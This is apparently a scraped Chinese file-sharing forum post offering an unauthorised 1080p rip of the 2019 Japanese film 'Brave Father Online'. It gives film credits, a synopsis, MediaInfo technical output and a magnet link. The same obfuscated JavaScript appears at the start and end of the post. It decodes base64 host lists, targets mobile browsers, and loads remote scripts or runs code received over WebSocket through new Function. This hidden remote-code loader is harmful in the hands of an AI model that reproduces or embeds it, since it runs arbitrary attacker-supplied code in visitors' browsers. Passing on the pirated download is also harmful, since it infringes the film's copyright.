最终幻想14:光之老爸 剧场版[中文字幕].Brave.Father.Online.Our.Story.of.Final.Fantasy.XIV.2019.BluRay.1080p.x265.10bit.FLAC.MNHD 6.32GB

版主小s 1月前 556

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 最终幻想14:光之老爸 剧场版 / 我和父亲的FINAL FANTASY XIV(港) / 剧场版 最终幻想14:光之父亲

◎片 名 劇場版 ファイナルファンタジーXIV光のお父さん

◎年 代 2019

◎产 地 日本

◎类 别 剧情 / 家庭

◎语 言 日语

◎上映日期 2019-06-21(日本)

◎IMDb链接 https://www.imdb.com/title/tt10551160/

◎豆瓣评分 7.3/10 (1879人评价)

◎豆瓣链接 https://movie.douban.com/subject/33377523/

◎片 长 114分钟

◎导 演 野口照夫 Teruo Noguchi (id:1377957)

山本清史 Kiyoshi Yamamoto (id:1377958)

◎编 剧 吹原幸太 K?ta Fukihara (id:1377959)

◎演 员 坂口健太郎 Kentaro Sakaguchi (id:1340281)

吉田钢太郎 K?tar? Yoshida (id:1004817)

佐久间由衣 Yui Sakuma (id:1348586)

山本舞香 Maika Yamamoto (id:1316810)

佐藤隆太 Ry?ta Sat? (id:1179886)

财前直见 Naomi Zaizen (id:1015896)

南条爱乃 Yoshino Nanjo (id:1276139)

寿美菜子 Minako Kotobuki (id:1275208)

悠木碧 Aoi Yuki (id:1001776)

◎标 签 日本 / 亲情 / 家庭 / 日本电影 / 最终幻想 / 坂口健太郎 / 2019 / 喜剧

◎简 介

感动全日本机迷,真人真事改编,殿堂级游戏系列《FINAL FANTASY》首度跳入真人电影舞台!

工作狂老豆岩田晓(吉田钢太郎 饰)含蓄寡言,为养家日夜劳碌,冷落儿子光生(坂口健太郎 饰)。缺乏父亲关怀的光生,记忆中唯一一次同对方真正交流,就是童年某夜两人一齐玩电视游戏《FINAL FANTASY III》。

某日,晓无缘无故突然辞职退休,家人为此大感困惑。为找出背后原因兼重修旧好,光生决定启动「光之父亲」计划!他先推荐老豆玩多人网络RPG游戏《FINAL FANTASY XIV》,再在游戏中以神秘女玩家Maidy的身份结伴,把对方训练成高手,带他和一班网络玩家过关斩将!迷上游戏的晓逐渐开怀,更与光生组队打终极大佬,并吐露埋藏心底的秘密…

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 217389934675725875643293417761375620571 (0xA38BC74A77B999FA22C3F36BC7A18DDB)

  4. Complete name : Brave.Father.Online.Our.Story.of[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.32 GiB

  8. Duration : 1 h 54 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 7 900 kb/s

  11. Movie name : Brave Father Online: Our Story of Final Fantasy XIV 2019 BluRay 1080p - FRDS

  12. Encoded date : UTC 2021-10-25 06:29:07

  13. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  14. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  15. Cover : Yes

  16. Attachments : cover.jpg


  17. Video

  18. ID : 1

  19. Format : HEVC

  20. Format/Info : High Efficiency Video Coding

  21. Format profile : Main [email protected]@High

  22. Codec ID : V_MPEGH/ISO/HEVC

  23. Duration : 1 h 54 min

  24. Bit rate : 7 357 kb/s

  25. Width : 1 920 pixels

  26. Height : 1 040 pixels

  27. Display aspect ratio : 1.85:1

  28. Frame rate mode : Constant

  29. Frame rate : 23.976 (24000/1001/53354) FPS

  30. Color space : YUV

  31. Chroma subsampling : 4:2:0

  32. Bit depth : 10 bits

  33. Bits/(Pixel*Frame) : 0.154

  34. Stream size : 5.88 GiB (93%)

  35. Writing library : x265 3.5+11-c8905a745:[Windows][MSVC 1929][64 bit] 10bit

  36. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1040 / interlace=0 / total-frames=164699 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=6 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-eob / no-eos / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=1 / keyint=250 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=100 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / no-hist-scenecut / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=5 / limit-refs=0 / no-limit-modes / me=3 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.50 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=-2 / crqpoffs=-2 / rc=crf / crf=21.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=1 / aq-strength=1.00 / no-cutree / zone-count=0 / no-strict-cbr / qg-size=8 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  37. Default : Yes

  38. Forced : No

  39. Color range : Limited

  40. Color primaries : BT.709

  41. Transfer characteristics : BT.709

  42. Matrix coefficients : BT.709


  43. Audio

  44. ID : 2

  45. Format : FLAC

  46. Format/Info : Free Lossless Audio Codec

  47. Codec ID : A_FLAC

  48. Duration : 1 h 54 min

  49. Bit rate mode : Variable

  50. Bit rate : 525 kb/s

  51. Channel(s) : 2 channels

  52. Channel layout : L R

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 11.719 FPS (4096 SPF)

  55. Bit depth : 16 bits

  56. Compression mode : Lossless

  57. Stream size : 430 MiB (7%)

  58. Writing library : libFLAC 1.2.1 (UTC 2007-09-17)

  59. Language : Japanese

  60. Default : Yes

  61. Forced : No


  62. Text #1

  63. ID : 3

  64. ID in the original source medium : 4608 (0x1200)

  65. Format : PGS

  66. Muxing mode : zlib

  67. Codec ID : S_HDMV/PGS

  68. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  69. Duration : 1 h 50 min

  70. Bit rate : 22.8 kb/s

  71. Count of elements : 2367

  72. Stream size : 18.0 MiB (0%)

  73. Language : Chinese

  74. Default : Yes

  75. Forced : No

  76. Original source medium : Blu-ray


  77. Text #2

  78. ID : 4

  79. ID in the original source medium : 4609 (0x1201)

  80. Format : PGS

  81. Muxing mode : zlib

  82. Codec ID : S_HDMV/PGS

  83. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  84. Duration : 1 h 53 min

  85. Bit rate : 26.8 kb/s

  86. Count of elements : 2421

  87. Stream size : 21.7 MiB (0%)

  88. Language : English

  89. Default : No

  90. Forced : No

  91. Original source medium : Blu-ray


  92. Menu

  93. 00:00:00.000 : Chapter 01

  94. 00:09:55.428 : Chapter 02

  95. 00:19:57.487 : Chapter 03

  96. 00:28:18.405 : Chapter 04

  97. 00:37:59.527 : Chapter 05

  98. 00:47:14.456 : Chapter 06

  99. 00:57:53.887 : Chapter 07

  100. 01:05:47.401 : Chapter 08

  101. 01:16:17.281 : Chapter 09

  102. 01:26:10.665 : Chapter 10

  103. 01:33:43.284 : Chapter 11

  104. 01:44:32.432 : Chapter 12


TAGS 剧情 家庭

磁力链:
  • magnet:?xt=urn:btih:182E73B6A376C13B051BCA00CB9FF1BC9AB01C3A

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};